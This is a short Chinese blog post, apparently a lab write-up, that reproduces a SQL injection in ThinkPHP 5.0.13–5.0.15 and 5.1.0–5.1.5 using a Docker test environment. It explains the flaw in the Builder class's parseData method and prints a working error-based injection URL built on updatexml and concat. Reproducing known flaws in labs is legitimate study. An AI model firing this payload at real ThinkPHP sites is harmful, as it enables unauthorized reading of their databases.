当前位置:   article > 正文

Thinkphp--in-sqlinjection

Thinkphp--in-sqlinjection

一、漏洞原理

在 Builder 类的 parseData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。

影响版本

5.0.13<=ThinkPHP<=5.0.15

5.1.0<=ThinkPHP<=5.1.5

在相应的文件夹位置打开终端后进行如下操作

二、漏洞复现

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

访问网页

http://192.168.83.136/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

这里用的是报错注入

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/521011
推荐阅读
相关标签
  

闽ICP备14008679号